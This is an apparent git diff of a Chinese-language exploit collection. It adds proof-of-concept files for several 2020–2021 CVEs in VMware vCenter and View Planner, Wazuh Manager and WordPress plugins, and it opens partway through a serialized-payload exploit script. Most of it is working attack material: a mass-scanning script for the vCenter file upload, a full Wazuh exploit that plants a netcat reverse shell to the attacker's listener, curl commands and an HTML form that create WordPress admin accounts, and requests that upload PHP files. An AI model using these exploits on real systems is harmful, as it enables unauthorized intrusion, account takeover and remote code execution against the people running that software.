e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
# adjust header for appropriate message length
payload=struct.pack('>I',len(payload)) + payload[4:]
print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
```

35
服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md Normal file
View File

@ -0,0 +1,35 @@
# VMware View Planner 未授权RCE CVE-2021-21978
## 漏洞描述
输入验证不正确以及缺少授权会导致在logupload Web应用程序中上传任意文件。具有对View Planner Harness的网络访问权限未经授权的攻击者可以上传并执行特制文件从而导致在logupload容器中远程执行代码。
参考链接:
- https://www.vmware.com/security/advisories/VMSA-2021-0003.html
## 漏洞复现
poc
```
POST /logupload?logMetaData={"itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py","workloadID":"2"}
Accept-Encoding:gzip,deflate
Content-Type:multipart/form-data;boundary=---WebKitFormBoundaryH8GoragzRFVTw1VD
------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition:form-data;name="logfile";filename=""
Content-Type:text/plain
#! /usr/bin/env python3
import cgi
import os,sys
import logging
import jsom
....
```
![image-20221207141859357](images/image-20221207141859357.png)

33
服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md Normal file
View File

@ -0,0 +1,33 @@
# VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
## 漏洞描述
VMware vCenter Server 插件中对用户提供的输入验证不当,未经过身份验证的远程攻击者可以发送特制的 HTTP 请求,欺骗应用程序向任意系统发起请求。
参考链接:
* https://kb.vmware.com/s/article/82374
* https://twitter.com/osama_hroot/status/1365586206982082560
## 漏洞影响
```
vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0
Cloud Foundation: before 3.10.1.2, 4.2
```
## 漏洞复现
poc
```
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
HOST:
vcIP: SSRF
vcUsername:sa
vaPassword:sa
reqResource:sa
...
```
![image-20221207141353136](images/image-20221207141353136.png)

162
服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md Normal file
View File

@ -0,0 +1,162 @@
# VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
## 漏洞描述
由于对 vSphere vCenter Server中用户提供的输入的验证不足因此存在该漏洞。远程非身份验证攻击者可以向端口 443/tcp 发送专门制作的 HTTP 请求,并在系统上执行任意代码。
参考链接:
- https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/
- https://swarm.ptsecurity.com/unauth-rce-vmware/
- https://www.vmware.com/security/advisories/VMSA-2021-0002.html
## 漏洞影响
```
VMware vCenter Server 7.0系列 < 7.0.U1c
VMware vCenter Server 6.7系列 < 6.7.U3l
VMware vCenter Server 6.5系列 < 6.5 U3n
```
## FOFA
```
app="vmware-vCenter"
```
## 漏洞复现
漏洞路径:
```
https://target/ui/vropspluginui/rest/services/uploadova
POST: name="uploadFile"; filename="xxx.tar"
```
构造POST包上传tar文件
![](images/16142224147525.jpg)
Linux可以直接创建../../home/vsphere-ui/.ssh/authorized_keys TAR文件 后直接SSH连Windows可以直接写入webshell。
批量检测脚本:
- https://raw.githubusercontent.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/main/CVE-2021-21972.py
```python
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/25 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)
import threadpool
import random
import argparse
import http.client
import urllib3
import base64
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def CVE_2021_21972(url):
# proxies = {"scoks5": "http://127.0.0.1:1081"}
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
headers = {
'User-Agent': get_ua()
}
# data = base64.b64decode(Payload)
# files = {'uploadFile': open('all.tar', 'rb')} #linux
files = {'uploadFile': open('test.tar', 'rb')} #win
targetUrl = url + TARGET_URI
try:
res = requests.post(url=targetUrl,
headers=headers,
files=files,
verify=False,
proxies=proxies)
# proxies={'socks5': 'http://127.0.0.1:1081'})
if res.status_code == 200 and "SUCCESS" in res.text:
print("[+] URL:{}--------存在CVE-2021-21872漏洞".format(url))
# print("[+] Command success result: " + res.text + "\n")
with open("存在漏洞地址.txt", 'a') as fw:
fw.write(url + '\n')
else:
print("[-] " + url + " 没有发现CVE-2020-14882漏洞.\n")
# except Exception as e:
# print(e)
except:
print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
# func_params = [i] + [cmd]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(CVE_2021_21972, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="Url File; Example:url.txt")
# parser.add_argument("-t",
# "--tar",
# help="Create tar File; Example:test.tar")
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
args = parser.parse_args()
url = args.url
# cmd = args.cmd
file_path = args.file
# jsp = args.tar
# if jsp != None:
# print(jsp)
# generate_zip(jsp)
if url != None and file_path ==None:
CVE_2021_21972(url)
elif url == None and file_path != None:
multithreading(file_path, 10) # 默认15线程
if __name__ == "__main__":
main()
```

151
服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md Normal file
View File

@ -0,0 +1,151 @@
# Wazuh Manager 代码执行漏洞CVE-2021-26814
## 漏洞描述
Wazuh 从4.0.0到4.0.3的 Wazuh API允许经过身份验证的用户通过/manager/files URI以管理权限执行任意代码。
## 漏洞影响
```
Wazuh Manager v.4.0.0-4.0.3
```
## 漏洞复现
poc
```
PoC.py [-h] -user USERNAME -pwd PASSWORD -lip SRCIP -lport SRCPORT -tip
DESTIP -tport DESTPORT
```
```python
# Exploit Title: Wazuh 4.0.3 API RCE
# Author: WickdDavid (Davide Meacci)
# Date: 2021-01-01
# Vendor Homepage: https://github.com/wazuh/wazuh
# Version : 4.0.3
import requests
import sys
import argparse
import time
import json
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')
parser.add_argument('-user', dest='username',required=True,
help='wazuh API username')
parser.add_argument('-pwd', dest='password',required=True,
help='wazuh API password')
parser.add_argument('-lip', dest='srcip',required=True,
help='listening server')
parser.add_argument('-lport', dest='srcport',required=True,
help='listening port')
parser.add_argument('-tip', dest='destip',required=True,
help='target server ip (wazuh API)')
parser.add_argument('-tport', dest='destport',required=True,
help='target server port (wazuh API)')
args = parser.parse_args()
# executed payload may be changed here
exec_payload = """
import os #:l
os.system("nc %s %s -e /bin/sh") #:l
""" % (args.srcip, args.srcport)
config_payload = { "drop_privileges": False }
proxies = {
"http":"http://127.0.0.1:8080",
"https":"https://127.0.0.1:8080"
}
target = "https://%s:%s" % (args.destip,args.destport)
auth_token = ""
path_traversal = "etc/lists/../../../../.."
headers = {}
# step 1 - obtaining auth token
r = requests.get("%s/security/user/authenticate?raw=true" % target, auth=(args.username, args.password),verify=False)
if(r.status_code == 200):
auth_token = r.text
headers["Authorization"] = "Bearer %s" % auth_token
else:
print("[!] No auth code recovered. Check username and password")
exit(1)
# step 2 - Privilege Escalation on API (not implemented)
# step 3 - Save files to be restored later
file_to_overwrite = "/var/ossec/api/scripts/wazuh-apid.py"
print("[+] Saving files to restore later...")
r = requests.get("%s/manager/files?path=%s%s" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False)
f = open("backup.py","w")
f.write(json.loads(r.text)["contents"])
f.close()
time.sleep(1)
# step 4 - Local Privilege Escalation
print("[+] Changing API config to run as root...")
r = requests.put("%s/manager/api/config" % target, headers = headers, json = config_payload, verify=False)
time.sleep(1)
# step 5 - Restart server (now api service runs as root)
print("[+] Restarting server...")
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
#print(r.text)
data = {"title":"Bad Request"}
while "title" in data and "Bad request" in data["title"]:
time.sleep(5)
try:
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
#print(r.text)
data = json.loads(r.text)
except:
continue
# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload
print("[+] Uploading payload...")
r = requests.put("%s/manager/files?path=%s%s&overwrite=true" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False)
#print(r.text)
time.sleep(1)
# step 7 - Restart server (now malicious payload will be run by the server)
print("[+] Restarting API service for the last time...")
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
#print(r.text)
data = {"title":"Bad Request"}
while "title" in data and "Bad request" in data["title"]:
time.sleep(5)
try:
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
#print(r.text)
data = json.loads(r.text)
except:
continue
print("[+] Payload executed, check your shell now.")
print("[+] Remember to restore changed file (check local backup file)")
```

42
服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md Normal file
View File

@ -0,0 +1,42 @@
# WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175
## 漏洞描述
未经身份验证的用户可以使用"theplus_ajax_login"和"theplus_google_ajax_register" Ajax请求通过仅提供相关的用户名就可以像任何用户一样轻松地进行身份验证。
参考链接:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24175
- https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89
## 漏洞影响
```
Elementor Page Builder <4.1.7
```
## 漏洞复现
poc
```
curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
```
"theplus_google_ajax_register" AJAX请求还可以允许任何未经身份验证的用户创建具有任意角色的帐户例如admin然后登录。
html
```html
<form method="POST" action="https://example.com/wp-admin/admin-ajax.php">
<input value="newadmin" name="name" type="text">
<input value="test@example.com" name="email" type="text">
<input value="test" name="password" type="text">
<input value="theplus_google_ajax_register" name="action" type="text">
<input value="administrator" name="tp_user_reg_role" type="text">
<input value="any" name="nonce" type="text">
<input type="submit" />
</form>
```

41
服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md Normal file
View File

@ -0,0 +1,41 @@
# WordPress File Manager6.9 RCE CVE-2020-25213
## 漏洞复现
poc
```
curl -ks --max-time 5 -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@/$file_upload" "hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
```
```
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Content-Length: 631
Content-Type: multipart/form-data; boundary=------------------------9689147a5989a801
Connection: close
--------------------------9689147a5989a801
Content-Disposition: form-data; name="reqid"
17457a1fe6959
--------------------------9689147a5989a801
Content-Disposition: form-data; name="cmd"
upload
--------------------------9689147a5989a801
Content-Disposition: form-data; name="target"
l1_Lw
--------------------------9689147a5989a801
Content-Disposition: form-data; name="mtime[]"
1576045135
--------------------------9689147a5989a801
Content-Disposition: form-data; name="upload[]"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
--------------------------9689147a5989a801--
```

71
服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md Normal file
View File

@ -0,0 +1,71 @@
# WordPress SuperForms 4.9 任意文件上传到远程代码执行
## 漏洞描述
SuperForms官方链接https://renstillmann.github.io/super-forms/#/
参考链接:
- https://www.exploit-db.com/exploits/49490
## 漏洞影响
```
All (<= 4.9.X)
```
## Google Dork
```
inurl:"/wp-content/plugins/super-forms/"
```
## 漏洞复现
poc
```
POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
<=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"
8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"
0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";
filename="filename.(extension)" <==== inject code extension (.php4)
for example
Content-Type: application/pdf
Evil codes to be uploaded
-----------------------------423513681827540048931513055996--
# Uploaded Malicious File can be Found in :
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply .
```

BIN
服务器应用漏洞/images/16142224147525.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 438 KiB

BIN
服务器应用漏洞/images/image-20221207141353136.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 689 KiB

BIN
服务器应用漏洞/images/image-20221207141859357.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 900 KiB